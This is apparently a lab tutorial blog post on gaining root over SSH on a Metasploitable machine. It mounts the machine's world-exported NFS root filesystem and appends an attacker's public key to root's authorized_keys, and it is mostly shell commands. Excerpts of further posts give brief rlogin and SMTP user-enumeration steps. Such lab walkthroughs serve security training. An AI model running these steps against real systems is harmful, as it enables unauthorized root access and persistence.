Skip to main content

exploit rpcbind

                            exploit rpcbind with nfs

What is nfs?


    Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems in 1984,allowing a user on a client computer to access files over a network in a manner similar to how local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. The Network File System is an open standard defined in RFCs, allowing anyone to implement the protocol.

What is rpcbind?


    The rpcbind utility maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number so it can communicate with the requested service. Because RPC-based services rely on rpcbind to make all connections with incoming client requests, rpcbind must be available before any of these services



⧭Instructions:

    ifconfig -a
------------------------------------------------
    This is the IP Address of the Victim Machine.
    My IP Address is 192.168.1.5.


⧭Play the Linux

    Instructions:
        Click on the Linux in  VM
or 
        other pc but in same network connected
⧭Login to Linux

    Instructions:
        Login: root
        Password: toor or <whatever you changed it to>


⧭ Start nmap scan

        nmap -v <ip address>



  ==> port 111 exploit found


⧭Using rpcinfo

    Instructions:
        rpcinfo -p 192.168.1.5
        rpcinfo -p 192.168.1.5 | grep nfs

==> 192.168.1.5 - victim ip address

⧭Using showmount

         Instructions:
        
        Note(FYI):
        showmount -e 192.168.1.5

     showmount queries the mount daemon on a remote host for information
about the state of the NFS server on that machine.
                    The "/" filesystem is owned by root for most flavors of Unix                          Linux.  Allowing the world to mount to the "/" file system opens     up Paradora's box to an unlimited amount of exploits.



⧭Create SSH Key Pair

    Instructions:
  1.         mkdir -p /root/.ssh
  2.         cd /root/.ssh/
  3.         cat /dev/null > known_hosts        
             This is not necessary.  I do this to prevent a potential 
             man-in-the-middle known_host message.
             ssh-keygen -t rsa -b 4096
  1.    Enter file in which to save the key (/root/.ssh/id_rsa): hacker_rsa
     
  2. Enter passphrase (empty for no passphrase): Just Press Enter
            
  3. Enter same passphrase again: Just Press Enter
            
  4. ls -l


                                                         &&

⧭ Mount Metasploitable's "/" File System

    Instructions:
  1.         cd /
  2.         mount -t nfs 192.168.1.5:/ /mnt -o nolock
                ⤘nolock � Disables file locking.
  1.         df -k
    



⧭Modify metasploitable's authorized_keys file

    Instructions:
  •         cd /mnt/root/.ssh
  •         cp /root/.ssh/hacker_rsa.pub /mnt/root/.ssh/
  •         ls -l
  •         cat authorized_keys
  •         cat hacker_rsa.pub >> authorized_keys
  •         cat authorized_keys



⧭Obtain Root Access

    Instructions:
        cd /root/.ssh/
        ssh -i /root/.ssh/id_rsa root@192.168.1.5
        yes
            The "Are you sure ... (yes/no)?" message only occur during your very first connection.
        whoami
        exit



                                            by Er. SANJAY KUMAR
                                                                   sanjayyadav11210@gmail.com

Comments

Post a Comment

Popular posts from this blog

Exploit and connect to port 512 ,513, and 514

               Exploit and connect to port 512 ,513, and 514 ༄ Unix Basics      TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured       to allow remote access from any host (a standard ".rhosts + +" situation).       To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and      run the following command as your local root user. If you are prompted for an SSH key,      this means the rsh-client tools have not been installed and Ubuntu is defaulting to       using  SSH. 🔂 Step-1:               First type "nmap -v <victim ip>" 🔄 Step-2:               type "rlogin  -l <user account> <ip address of victim>                                                                          by Er. SANJAY KUMAR                                                                                                            sanjayyadav11210@gmail.com
Post a Comment
Read more

Exploit Smtp service port 25

                          Exploit SMTP service port 25   ✍️ Total 4 Ways we can exploit Smtp service ✍️ Type  -1 --> metasploit step -1 : Type msfconsole in terminal the it will open metasploit step - 2 type - search smtp step  3 : find auxiliary/scanner/smtp/smtp_enum then use it by use command  ex  msf> use auxiliary/scanner/smtp/smtp_enum   step  4 : Show options -- for requirement identity step  5 : set attribute using set command. ex set rhost <rhostip> Step 6 : exploit/run it using exploit command.                                                                             by Er. Sanjay Kumar ✍️ Type  -2 --> smtp-user-enum smtp-user-enum smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN, and RCPT TO commands. It could be adapted to work against other vu
Post a Comment
Read more